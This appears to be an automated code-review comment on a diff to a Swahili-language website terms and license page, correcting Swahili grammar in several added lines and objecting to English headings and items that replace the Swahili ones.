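Review bot: In hunk @@ -62,82 the line "+... Ikiwa hukubaliani na masharti haya, tafadhali usifanyi matumizi ya tovuti hii." uses an invalid negative form; the negative subjunctive is "usifanye" (or keep the removed line's plainer "usiingie kwenye tovuti hii"). In the same hunk "+... tunataka **kuwaruhusu watu jumuiya kutendea kazi yetu shukrani**" is missing the connective ("watu wa jumuiya") and "kutendea kazi yetu shukrani" is awkward; the removed line's "kuthamini kazi yetu" is clearer. "+- Adapt" with "na ujengwa juu ya nyenzo" should be "na ujenge juu ya nyenzo". Finally, the headings "+## LICENSE" and "+## **Disclaimer**" and the items "+- Attribution", "+- Share", "+- Adapt" replace Swahili with English while the body around them stays Swahili; keep "## LESENI", "## **KIDOKEZO CHA KUTOHUSIKA**", "Utambulisho", "Kushiriki" and "Kurekebisha" so the page has one language throughout.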